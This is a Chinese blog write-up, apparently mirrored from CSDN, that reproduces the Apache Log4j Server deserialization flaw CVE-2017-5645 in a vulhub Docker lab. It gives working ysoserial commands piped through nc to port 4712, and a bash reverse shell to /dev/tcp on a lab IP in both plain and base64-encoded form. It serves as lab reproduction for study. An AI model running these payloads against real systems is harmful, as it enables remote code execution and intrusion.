码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【漏洞复现】Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)


    感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

    文章目录

        • 1.1、漏洞描述
        • 1.2、漏洞等级
        • 1.3、影响版本
        • 1.4、漏洞复现
          • 1、基础环境
          • 2、漏洞扫描
          • 3、漏洞验证
        • 1.5、深度利用
          • 1、反弹Shell

    说明内容
    漏洞编号CVE-2017-5645
    漏洞名称Log4j Server 反序列化命令执行漏洞
    漏洞评级高危
    影响范围Apache Log4j 2.8.2之前的2.x版本
    漏洞描述
    修复方案

    1.1、漏洞描述

    攻击者可以通过发送一个特别制作的2进制payload,在组件将字节反序列化为对象时,触发并执行构造的payload代码。该漏洞主要是由于在处理ObjectInputStream时,接收函数对于不可靠来源的input没有过滤。可以通过给TcpSocketServer和UdpSocketServer添加可配置的过滤功能以及一些相关设置,可以有效的解决该漏洞。

    1.2、漏洞等级

    漏洞危害评分:7.5,攻击者可利用该漏洞执行任意代码。

    1.3、影响版本

    Apache Log4j 2.8.2之前的2.x版本

    1.4、漏洞复现

    1、基础环境

    kali环境IP地址:192.168.8.8

    Path:vulhub/log4j/CVE-2017-5645


    启动测试环境:

    sudo docker-compose up -d
    
    • 1
    2、漏洞扫描
    3、漏洞验证

    扫描目标开启的端口

    在这里插入图片描述

    ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。主驱动程序接受用户指定的命令,并将其封装在用户指定的小工具链中,然后将这些对象序列化为stdout。当类路径上具有所需小工具的应用程序不安全地反序列化该数据时,将自动调用该链并导致在应用程序主机上执行该命令。

    ysoserial项目地址:

    https://github.com/frohoff/ysoserial

    下载打包好的jar文件到我们的kali主机上

    在这里插入图片描述
    进行利用,先创建一个文件,来进行测试

    java -jar ysoserial-all.jar CommonsCollections5 "touch /tmp/saury" | nc 192.168.8.8 4712
    
    • 1

    在这里插入图片描述

    1.5、深度利用

    1、反弹Shell
    bash -i >& /dev/tcp/192.168.8.8/6868 0>&1
    
    • 1

    将反弹shell进行base64编码

    在这里插入图片描述

    YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguOC82ODY4IDA+JjE=
    
    • 1

    shell反弹

    java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjguOC82ODY4IDA+JjE=}|{base64,-d}|{bash,-i}" | nc 192.168.8.8 4712
    
    • 1

    在这里插入图片描述

    在这里插入图片描述

  • 相关阅读:
    生信豆芽菜-预后模型比较c-index计算
    Leftpad事件 我们是不是早已忘记该如何好好地编程?
    STL之优先级队列(priority_queue)
    腾讯出来的3年测试经验小伙来面试,他这情况要求18K我该给吗?
    数据结构基础9:排序全家桶
    HCIE-Security Day47:AC准入控制MAC
    抖音店铺提供优质服务|成都瀚网科技
    Spring Data Elasticsearch介绍(七)
    基于MiDas的深度估计算法移植与测试
    Wireshark 如何查找包含特定数据的数据帧
  • 原文地址:https://blog.csdn.net/ZhaoSong_/article/details/134221118
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号